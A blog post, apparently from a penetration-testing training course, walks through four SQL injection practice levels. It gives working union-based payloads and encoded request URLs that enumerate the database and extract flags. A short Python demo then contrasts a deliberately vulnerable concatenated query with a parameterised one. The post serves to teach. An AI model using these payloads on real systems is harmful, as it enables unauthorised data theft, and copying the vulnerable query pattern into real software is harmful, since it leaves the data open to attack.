Fengshentai: Training Camp, Learning Penetration Testing from Scratch

SQL Injection Practice Range: Basic Range 1

1. Test whether SQL injection exists: and 1=2
2. Determine the number of columns: order by 3
3. Find which columns are echoed back: and 1=2 union select 1,2,3
4. Query the database name: and 1=2 union select 1,database(),3


5. Query the table names: and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema='error'
6. Query the column names: and 1=2 union select 1,column_name,3 from information_schema.columns where table_name='error_flag' limit 1,1
7. Query the actual data: and 1=2 union select 1,2,flag from error_flag limit 0,1
Query all table names at once: and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='error'
Query all column names at once: and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='error_flag'
Query all field values at once: and 1=2 union select 1,2,group_concat(id,flag) from error_flag


SQL Injection Practice Range: Basic Range 2

  1. Test whether injection exists: 'and 1=1 -- d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%20%27and%201=1%20--%20d
  2. Determine the number of columns: 'order by 3 -- d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27order%20by%203%20--%20d
  3. Find which columns are echoed back: 'and 1=2 union select 1,2,3 -- d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27and%201=2%20union%20select%201,2,3%20--%20d
  4. Query the database name: 'and 1=2 union select 1,database(),3 -- d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27and%201=2%20union%20select%201,database(),3%20--%20d
  5. Query the table names: 'and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema='error' -- d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%20%27and%201=2%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27error%27%20--%20d
  6. Query the column names: 'and 1=2 union select 1,column_name,3 from information_schema.columns where table_name='error_flag' limit 0,1 -- d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27and%201=2%20union%20select%201,column_name,3%20from%20information_schema.columns%20where%20table_name=%27error_flag%27%20limit%200,1%20--%20d
  7. Query the actual data: 'and 1=2 union select 1,2,flag from error_flag limit 1,1 -- d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27and%201=2%20union%20select%201,2,flag%20from%20error_flag%20limit%201,1%20--%20d

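SQL Injection Practice Range: Basic Range 3

Close the syntax that precedes the parameter and comment out what follows it; the method is otherwise the same as above.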

') and 1=2 union select 1,flag,2 from error_flag limit 2,1 -- q

SQL Injection Practice Range: Basic Range 4

") and 1=2 union select 1,flag,2 from error_flag limit 3,1 -- d
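
Ranges 1 to 3 differ only in how the id parameter is quoted inside the server's query. The following added example (not from the original post or the lab) runs each range's final payload against a string-concatenated query and against a bound parameter. Assumptions: SQLite stands in for MySQL, the news table, the three query templates and the flag values are constructed, and Range 4's double-quote form is left out because SQLite treats double-quoted text as an identifier.

```python
import sqlite3

# Constructed stand-in for the lab database; the news table and flag values are made up.
FLAGS = ["flag-A", "flag-B", "flag-C", "flag-D"]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, content TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'hello', 'world')")
    db.execute("CREATE TABLE error_flag (id INTEGER PRIMARY KEY, flag TEXT)")
    db.executemany("INSERT INTO error_flag (flag) VALUES (?)", [(f,) for f in FLAGS])
    return db

# Assumed server-side templates, inferred from the prefix each range's payload needs.
TEMPLATES = {
    1: "SELECT id, title, content FROM news WHERE id={}",
    2: "SELECT id, title, content FROM news WHERE id='{}'",
    3: "SELECT id, title, content FROM news WHERE id=('{}')",
}

# id values from the walkthrough: id=1 followed by each range's final payload.
PAYLOADS = {
    1: "1 and 1=2 union select 1,2,flag from error_flag limit 0,1",
    2: "1'and 1=2 union select 1,2,flag from error_flag limit 1,1 -- d",
    3: "1') and 1=2 union select 1,flag,2 from error_flag limit 2,1 -- q",
}

def vulnerable_lookup(db, level, user_id):
    # Vulnerable: the parameter is spliced into the SQL text and can change the statement.
    return db.execute(TEMPLATES[level].format(user_id)).fetchall()

def safe_lookup(db, user_id):
    # Hardened: the value is bound as data and is never parsed as SQL.
    sql = "SELECT id, title, content FROM news WHERE id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def leaked_flags(rows):
    # Collect any error_flag values that ended up in the result set.
    return [v for row in rows for v in row if v in FLAGS]

if __name__ == "__main__":
    db = make_db()
    for level, payload in PAYLOADS.items():
        leaked = leaked_flags(vulnerable_lookup(db, level, payload))
        print(level, "concatenated:", leaked, "| bound:", safe_lookup(db, payload))
```

With the bound parameter, the quoting style of the template no longer matters, which is why one fix covers all of the ranges.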


posted @ 2022-10-12 21:30  sparename